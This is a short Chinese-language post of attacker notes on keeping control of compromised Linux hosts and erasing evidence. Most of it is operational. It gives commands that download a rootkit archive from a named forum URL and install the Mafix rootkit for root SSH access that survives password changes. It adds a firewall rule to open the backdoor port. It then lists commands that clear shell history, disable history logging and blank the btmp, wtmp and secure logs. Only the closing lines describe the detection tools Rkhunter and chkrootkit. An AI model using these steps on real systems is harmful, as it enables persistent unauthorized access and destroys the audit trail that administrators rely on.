linux入侵控制与痕迹清理

后门

(1)开机自动反弹shell

(2)linux后门

Rookit

目前常用的有：t0rn /mafix/enyelkm 等

mafix rootkit

Mafix是一款常用的轻量应用级别Rootkits，是通过伪造ssh协议漏洞实现远程登陆的特点是配置简单并可以自定义验证密码和端口号。
URL:http://forum.eviloctal.com/attachment.php?aid=13419

注意：在某些linux发行版上可能会遇到问题导致功能问题

安装及使用：
wget http://forum.eviloctal.com/attachment.php?aid=13419
tar zvxf mafix.tar.gz
cd mafix
chmod +x root
./root pass port

安装完成后，使用ssh 用户@IP -P 配置的端口，即可远程登录。
netstat -tnl 也验证端口是开放的。之前解压文件的目录/home/mafix在编译完后自动消失，便于隐藏。

现在就可以用root，加上新密码、端口进行登录了，即使管理员改了root的密码也可以登录。

若无法登录，检查Linux的防火墙是否关闭，或者是否把新端口加入iptables中：

iptables -A RH-Firewall--INPUT -m state --state NEW -m tcp -p tcp --dport 端口 -j ACCEPT

痕迹清理

清理命令记录：

(1)仅清理当前用户： history -c

(2)使系统不再保存命令记录：vi /etc/profile，找到HISTSIZE这个值，修改为0

(3)删除记录

删除登录失败记录：echo > /var/log/btmp
删除登录成功记录：echo > /var/log/wtmp （此时执行last命令就会发现没有记录）
删除日志记录：echo > /var/log/secure

安全检测

Rkhunter

Rkhunter的中文名叫“Rootkit猎手”, 目前可以发现大多数已知的rootkits和一些嗅探器以及后门程序. 它通过执行一系列的测试脚本来确认服务器是否已经感染rootkits. 比如检查rootkits使用的基本文件, 可执行二进制文件的错误文件权限, 检测内核模块等等。

Chkrootkit

当然如果只是用Rkhunter检查扫描还是不够权威，再来安装一款检查下吧，chkrootkit 是一款小巧易用的Unix平台上的可以检测多种rootkit入侵的工具。它的功能包括检测文件修改、utmp/wtmp/last日志修改、界面欺骗(promiscuous interfaces)、恶意核心模块(maliciouskernel modules)。

相关链接

http://www.freebuf.com/articles/network/23665.html

http://www.myhack58.com/Article/html/3/8/2011/29132.htm

http://www.tuicool.com/articles/eIv22az